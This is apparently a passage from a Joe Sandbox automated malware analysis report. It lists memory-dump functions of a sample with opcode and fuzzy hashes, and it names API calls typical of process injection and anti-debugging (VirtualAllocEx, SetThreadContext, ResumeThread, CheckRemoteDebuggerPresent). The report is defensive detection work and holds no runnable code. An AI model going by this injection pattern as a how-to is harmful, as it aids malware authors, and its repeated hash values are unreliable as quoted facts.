API String ID: 1726664587-0
Opcode ID: f7d8093298dcd8d63bf2f90138830b430791c5adfa5b47283b176071c9563c7a
Instruction ID: cc5c64ea70cac4fef1ecaec90d5d9e6fba5c8099418aa8cbb26e3a64f30ea347
Opcode Fuzzy Hash: f7d8093298dcd8d63bf2f90138830b430791c5adfa5b47283b176071c9563c7a
Instruction Fuzzy Hash: 394176B9D042589FCF10CFA9D984ADEFBF1BB19310F14A02AE814B7210D375A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00A9FB90 Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00A9FC45

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 26602d9f84e772b49ef51e858db9e119b8c62584a723781cf9f4657e641a430d
Instruction ID: cb2473c1935b98824a088101f5050fba9dafcdfae3e590e5b2613278073c25a9
Opcode Fuzzy Hash: 26602d9f84e772b49ef51e858db9e119b8c62584a723781cf9f4657e641a430d
Instruction Fuzzy Hash: 6B4178B9D042589FCF10CFAAD984ADEFBF1BB19310F14906AE814B7250D335A946CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00A9FCA8 Relevance: 1.6, APIs: 1, Instructions: 98
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00A9FD55

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 18e7c0966474d4ab54096994872d86196e998eaabc876c87a98aaf87b44b98e6
Instruction ID: cd7af48510da9e31177f1dffd6651cd9972ec3cb9a01773f314732a9f95186bc
Opcode Fuzzy Hash: 18e7c0966474d4ab54096994872d86196e998eaabc876c87a98aaf87b44b98e6
Instruction Fuzzy Hash: 343176B8D042589FCF10CFA9D884ADEFBB0AB09310F14A02AE824B7210D334A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00A9DA54 Relevance: 1.6, APIs: 1, Instructions: 98
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00A9FD55

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7f6dd921301ffe0df3fe1d919cce8daf42b9d5f7ee2f4283e181a9f44e0ddacf
Instruction ID: 7bed71365f3d7a980d32a3d949a01c9199aa59ef933856384451d75fc9fd9945
Opcode Fuzzy Hash: 7f6dd921301ffe0df3fe1d919cce8daf42b9d5f7ee2f4283e181a9f44e0ddacf
Instruction Fuzzy Hash: 333185B9E042589FCF10CFA9D984A9EBBF0BB09310F10A02AE814B7310D334A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00A9BD18 Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumWindows.USER32(?,?), ref: 00A9BDB9

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: ef158ac89db9f95687e7d16a9ca36cf279ce2a705a08e03434f4db96b3913532
Instruction ID: 75546a19029ae2cb52a6fbe400fbf09da451b44b9fa759e7d49f22d6e4528dc5
Opcode Fuzzy Hash: ef158ac89db9f95687e7d16a9ca36cf279ce2a705a08e03434f4db96b3913532
Instruction Fuzzy Hash: 9931CAB4D052589FDF10DFA9E984AEEFBF1BF49314F14942AE805B7240C734A945CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00A9DA24 Relevance: 1.6, APIs: 1, Instructions: 91
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,?), ref: 00A9FB32

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 11861c4bc6838a51c3715dfe55449a1e37536f437d7d0cbfac8b72f401033609
Instruction ID: 9beae56ced4322fd3b005b052d878ab2ea70590473cf38cebab6b0ed5b85fc6d
Opcode Fuzzy Hash: 11861c4bc6838a51c3715dfe55449a1e37536f437d7d0cbfac8b72f401033609
Instruction Fuzzy Hash: 4C3198B5D012589FCF10CFA9D984ADEFBF1BB49314F24802AE818B7240D778A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A9DA6C Relevance: 1.6, APIs: 1, Instructions: 91threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 00A9FB32

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: a785a7bb9710400dc0f467007ae34590401ecb802d7d548fd955c572369a8243
Instruction ID: ebea49227101c0ba81206ff3dc6f544533f66695ffaa851319e2895439f116b5
Opcode Fuzzy Hash: a785a7bb9710400dc0f467007ae34590401ecb802d7d548fd955c572369a8243
Instruction Fuzzy Hash: 3D3198B5D012589FCF10CFA9D984ADEFBF1BB49314F24802AE818B7240D778A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A9FA83 Relevance: 1.6, APIs: 1, Instructions: 90threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 00A9FB32

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 2207e681ac799a6824aa72d1ed2ad785a8142c148f847b7c67345196999a2b3d
Instruction ID: ab08f2af10dfd82c5cbba693f1699590ae621e921e824d8c768458ee0a89bfeb
Opcode Fuzzy Hash: 2207e681ac799a6824aa72d1ed2ad785a8142c148f847b7c67345196999a2b3d
Instruction Fuzzy Hash: 283198B5D012589FCF10CFA9D984ADEFBF1BB49314F24802AE819B7250D378AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00A9BD20 Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

EnumWindows.USER32(?,?), ref: 00A9BDB9

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 476187cc2dd816b87c0300ac4b2db8450d04086704c0b97515f9beec2aad606b
Instruction ID: a5d060cce8b7d28aa682123b076c67d26218a0c2cfefeaa72a059d01290e75e6
Opcode Fuzzy Hash: 476187cc2dd816b87c0300ac4b2db8450d04086704c0b97515f9beec2aad606b
Instruction Fuzzy Hash: 2431B9B4D052189FCF14DFA9E984AEEFBB1BF49314F14942AE405B7240C734A945CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00A9B949 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00A9B9DE

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: a1334db0dc5e763b52ce51534a864b725879b900576c7c9c6a17140597c01655
Instruction ID: d4a836555e741fd5eafb1cc5c10e000012c1f10aa8ca3094534717560e7a0fe3
Opcode Fuzzy Hash: a1334db0dc5e763b52ce51534a864b725879b900576c7c9c6a17140597c01655
Instruction Fuzzy Hash: F131B9B4D052589FCF10CFA9E984AAEFBF0BF49364F14942AE914B7240C774A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A97E50 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00A9BACE

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 3b797fb8409df35b4cb4900288e2cb3427889b7aa587890d0102d0ae8c328575
Instruction ID: 3ab58e39eb815b994a44d169e2ce929720802402b39115cffc273ffdf6afd828
Opcode Fuzzy Hash: 3b797fb8409df35b4cb4900288e2cb3427889b7aa587890d0102d0ae8c328575
Instruction Fuzzy Hash: 243198B4E142189FCB10CFA9E584ADEFBF4EB49324F14902AE915B7300D774A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A9DA84 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 00A9FF6E

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 59f1f8dd0aa75739befcd9c04df4f0954fc95777f6322d3b1a19088a41782e9d
Instruction ID: 93474e39ab6239e419168e29380e9c6621feddace44a73993b4bd9aaa222a850
Opcode Fuzzy Hash: 59f1f8dd0aa75739befcd9c04df4f0954fc95777f6322d3b1a19088a41782e9d
Instruction Fuzzy Hash: 8221A8B5E042189FCF10CFA9D584ADEFBF4AB49324F24902AE815B7310D374A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A9FEF0 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 00A9FF6E

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a056d9016e36c7e93ae870cc880fa4fb31b0048ce306cf2d7d888fa103db5537
Instruction ID: 1e5a9153ff358adb07ffa5b0ed92403f4cfb65a40de2b7124fc12f016823aa48
Opcode Fuzzy Hash: a056d9016e36c7e93ae870cc880fa4fb31b0048ce306cf2d7d888fa103db5537
Instruction Fuzzy Hash: 5021C8B5E042189FCF10CFA9D484ADEFBF0AB4A320F14902AE814B7310C334A941CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A9BA48 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00A9BACE

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 8d691602d91a937d21a8dae452dba4962e6094860276985279b25f519c371773
Instruction ID: c0815239631daf40b1191cfa6cdfecdc02a058c6d000da3aed763e92da00e489
Opcode Fuzzy Hash: 8d691602d91a937d21a8dae452dba4962e6094860276985279b25f519c371773
Instruction Fuzzy Hash: 683197B8E042589FCB10CFA8E984ADEFBF0AB09324F14945AE815B7350D774A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 007AD3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.266567813.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ad000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaadf7f237d705630dc70338c5d824c551498241d7ec1631da9968d49420853b
Instruction ID: c102f7d0858e3cb38fa21064f03296e3c850c202f407ffae53ecb7841d376c07
Opcode Fuzzy Hash: eaadf7f237d705630dc70338c5d824c551498241d7ec1631da9968d49420853b
Instruction Fuzzy Hash: C12108B1504280DFDB24DF14D8C0B26BB65FBD8324F24C669ED0A4B606C33AEC45C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 007AD3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.266567813.00000000007AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ad000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce7c5481ea3966c2392968f11b64ad28d0706a2f7855728c1a55e95cda521e5a
Instruction ID: e7c2d46e16a71826666132d3d05952fa048c6b5871ed5708690d3aaf159cbf09
Opcode Fuzzy Hash: ce7c5481ea3966c2392968f11b64ad28d0706a2f7855728c1a55e95cda521e5a
Instruction Fuzzy Hash: 0911D376504280DFDB11CF10D9C4B16BF72FB99320F24C6A9DC094BA16C33AE856CBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A96508 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

u{+#, xrefs: 00A966A9

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID: u{+#
API String ID: 0-4044784664
Opcode ID: e542634934671d2065a368e3e3d1a62d654710841ea4adf855dbf5b6dbb40d8d
Instruction ID: ccebfd843cd574729c6ad26895ff17aa8245e9060f152bb0520fd4ccb08889f5
Opcode Fuzzy Hash: e542634934671d2065a368e3e3d1a62d654710841ea4adf855dbf5b6dbb40d8d
Instruction Fuzzy Hash: E561F775E056099FCF04CFA9CA809DEFBF2FF89310F29946AD505B7268D3349A418B64

Uniqueness

Uniqueness Score: -1.00%

Function 00A95C00 Relevance: 1.4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

Strings

f5[#, xrefs: 00A95DD8

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID: f5[#
API String ID: 0-3867256149
Opcode ID: 9659a0736f7b905cccd9413dbbd109a5a7c2c53a2a83ee9786cd9e0cdb0469e3
Instruction ID: 06d2851f361a5f524d1c9af2b2301095c9579970a70556981f1b485b1b990f11
Opcode Fuzzy Hash: 9659a0736f7b905cccd9413dbbd109a5a7c2c53a2a83ee9786cd9e0cdb0469e3
Instruction Fuzzy Hash: B271BFB0E1460A9FCF05CFA9D5818AEFBF2FF89310F24851AD415AB314D7349A828F95

Uniqueness

Uniqueness Score: -1.00%

Function 00A96518 Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

u{+#, xrefs: 00A966A9

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID: u{+#
API String ID: 0-4044784664
Opcode ID: 006d7b73a69fe620640ed9d7c8b1b3f7fe9e5c53f9b140abc3d335d6fb778061
Instruction ID: 1b6410922d27112ebf870b9bfadebf02224118bf654ecfdf56194b778d02aa1b
Opcode Fuzzy Hash: 006d7b73a69fe620640ed9d7c8b1b3f7fe9e5c53f9b140abc3d335d6fb778061
Instruction Fuzzy Hash: 7F61C575E05219DFCF04CFAACA809DEFBF2BF89310F28946AD505B7218D7349A418B64

Uniqueness

Uniqueness Score: -1.00%

Function 00A95BF1 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

f5[#, xrefs: 00A95DD8

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID: f5[#
API String ID: 0-3867256149
Opcode ID: cf1784bf322822c8effed631a607d036d84005e45f4ad662865bf981f5946057
Instruction ID: a45b46d724a828fc3b0a2b59d4ad2be3c60fab5ff41f57cd2fa92659d46f80ff
Opcode Fuzzy Hash: cf1784bf322822c8effed631a607d036d84005e45f4ad662865bf981f5946057
Instruction Fuzzy Hash: 5361E374E0460A9FCF05CFA9D5829AEFBF2BF89310F24855AD415AB315C3349982CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00A92300 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0db85c7e3c137d6646555f1bc9d5111275bb23c6c06d740bb5d5ab728ff7bdd1
Instruction ID: 238268774b0654795e2f5be1b7934d0ad4f94ca4a573894cf65df886ede458c1
Opcode Fuzzy Hash: 0db85c7e3c137d6646555f1bc9d5111275bb23c6c06d740bb5d5ab728ff7bdd1
Instruction Fuzzy Hash: 26B12970E05219DFCB44DFA4D880A9EFBB2FF89300F118625E519AB355DB74A946CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00A92310 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48ac417ad3e6d256124cc43679a2cb9bd9fa13fdd02dbe19cfe4af558809cde6
Instruction ID: d76eed852159a3af2c08417e22f8458d03c32c874679445f9b3d4a4de583b47d
Opcode Fuzzy Hash: 48ac417ad3e6d256124cc43679a2cb9bd9fa13fdd02dbe19cfe4af558809cde6
Instruction Fuzzy Hash: AFB10774E01219DFCB44DFA9D880A9EFBB2FF89300F118625E519AB355DB74A946CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00A9B29C Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bea153106ec8d879f118d812ead1e3edee024aa4415a6c2e73d60268bb86b18
Instruction ID: 4b7d757da1571e64672b72356f2ed0f40ac65a198235482d2b77c27244924a33
Opcode Fuzzy Hash: 7bea153106ec8d879f118d812ead1e3edee024aa4415a6c2e73d60268bb86b18
Instruction Fuzzy Hash: 7771FFB4E142189FDF14CFA9E984BDEBBF1BB49304F10812AE415BB291DB749845CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A95F00 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 312cf2ac4139f76a630be9818f8f97dde47fdf4b6b12e9afb84fdc3f3a37576b
Instruction ID: 6a4e8b45ae87502da031ce1cb359c9b45a9f5658d318d30d85298a948ad1c40e
Opcode Fuzzy Hash: 312cf2ac4139f76a630be9818f8f97dde47fdf4b6b12e9afb84fdc3f3a37576b
Instruction Fuzzy Hash: A46114B0E0460A9BCF04CFAAC9815AEFBF2EF49350F24C16AD514B7254D7349A428F95

Uniqueness

Uniqueness Score: -1.00%

Function 00A95EF1 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e74660b64e8bf2a6cc0e86157eb74035acb59e8651036d1eb9c344dd035d4ce
Instruction ID: 6aff5992b01205c979570f9a68180daaad38db7992a56a5c1ece587f263b88df
Opcode Fuzzy Hash: 7e74660b64e8bf2a6cc0e86157eb74035acb59e8651036d1eb9c344dd035d4ce
Instruction Fuzzy Hash: 685108B0E0460A9BCF05CFAAC9855AEFBF2EF49310F24C16AD514A7254D7349A42CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A97E20 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 341e63d1cf847cef8baa3caa35122e4a766df4e746425a1a77bba08923240b38
Instruction ID: 31bf8c5087e1cc84800b3ca138bda573f2cc76d0f85a7d6fc140e77d76e6483c
Opcode Fuzzy Hash: 341e63d1cf847cef8baa3caa35122e4a766df4e746425a1a77bba08923240b38
Instruction Fuzzy Hash: F1511EB0E14218CFDF14CFA9E984BAEBBF1BB49304F10812AE415AB291DB749845CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00A9B74C Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3cdfe40f0e507d92969d2d7f6e2c6508cf97899f3de7ecf138d79652012a7e1
Instruction ID: 87c53feee1b5c514873689b4d17e1febd0df48f5908b7ff3068633b55496f8b6
Opcode Fuzzy Hash: c3cdfe40f0e507d92969d2d7f6e2c6508cf97899f3de7ecf138d79652012a7e1
Instruction Fuzzy Hash: 51510FB0E142189FDF14CFA9D984BEEBBF5BF49304F10812AD815AB290DB749845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A97E44 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58837ff8d8a0da4ecb935edc9a4d21463c859c7602091a2f810cb7783d3d5cc9
Instruction ID: e1277f93e8625387880e5389ac224754e867920a02805ccd68e5c6b02310f5f9
Opcode Fuzzy Hash: 58837ff8d8a0da4ecb935edc9a4d21463c859c7602091a2f810cb7783d3d5cc9
Instruction Fuzzy Hash: E551FEB0E142289FDF14CFA9D984BAEBBF5BF49304F10812AE415AB250DB749845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A97E5C Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fffec9a2cb9b545c925c0c3172408b2591f22fb5dd890afafd812f9496bee148
Instruction ID: dfca3c94e29fcf135d22c4558d9f6df26d0c5b322e19c8cd4cd639af2724a602
Opcode Fuzzy Hash: fffec9a2cb9b545c925c0c3172408b2591f22fb5dd890afafd812f9496bee148
Instruction Fuzzy Hash: DA51EDB0E142189FDF14CFA9E984B9EBBF1BF49304F10852AE815AB390DB749845CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00A9BB1C Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 294f825fe0a6ec3ad806ece9011ee40700aa12c84d35d74a610224265ce001f1
Instruction ID: c7cbfb8dbefc6d50c3f4cac2f52b0524a366ba902da3f92646685bd1b06234fe
Opcode Fuzzy Hash: 294f825fe0a6ec3ad806ece9011ee40700aa12c84d35d74a610224265ce001f1
Instruction Fuzzy Hash: FA510EB0E142588FDF14CFA9E985B9EBBF1BF49304F10852AE415AB290DB749849CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00A96298 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a12ad5b610a77a59d8deb85d741ed80d2d1b9a748252830d3b080dfc07042d9
Instruction ID: de8ac139c433dc2ef85b0847c6d2e713baed5830b503d23ba839f3eb51e100fb
Opcode Fuzzy Hash: 5a12ad5b610a77a59d8deb85d741ed80d2d1b9a748252830d3b080dfc07042d9
Instruction Fuzzy Hash: 3A5107B4E0425A9FCF08CFAAD5815AEFBF2BF89300F24D46AC515AB254D3349A418F91

Uniqueness

Uniqueness Score: -1.00%

Function 00A962A8 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f816f022f8c7caa3bffed673e9032b06cf7c02494a0f4eb0ffafa99be574313
Instruction ID: 4233c4e6f6b17f8670c73514bfe01057660a4ca78b94b19095d5e1ff1cdcab7e
Opcode Fuzzy Hash: 3f816f022f8c7caa3bffed673e9032b06cf7c02494a0f4eb0ffafa99be574313
Instruction Fuzzy Hash: E551E0B4E0421A9BCF08CFAAD5815AEFBF2BF88300F24D42AC515AB254D7349A418F95

Uniqueness

Uniqueness Score: -1.00%

Function 00A98C30 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.267198287.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_U8RYIwIvfK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a7745d46a808a9565a585f65305ac5ff4722f6f9840aa359d718876fa7de5b5
Instruction ID: 80fa007ebbe274b386c5dd2f3ca3359dee14a7190274977270e22e863de5f0f7
Opcode Fuzzy Hash: 7a7745d46a808a9565a585f65305ac5ff4722f6f9840aa359d718876fa7de5b5
Instruction Fuzzy Hash: 99511574E15218DFDB14CFAAD984ADEBBF2BF89300F20816AD409AB324DB349941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A96950 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

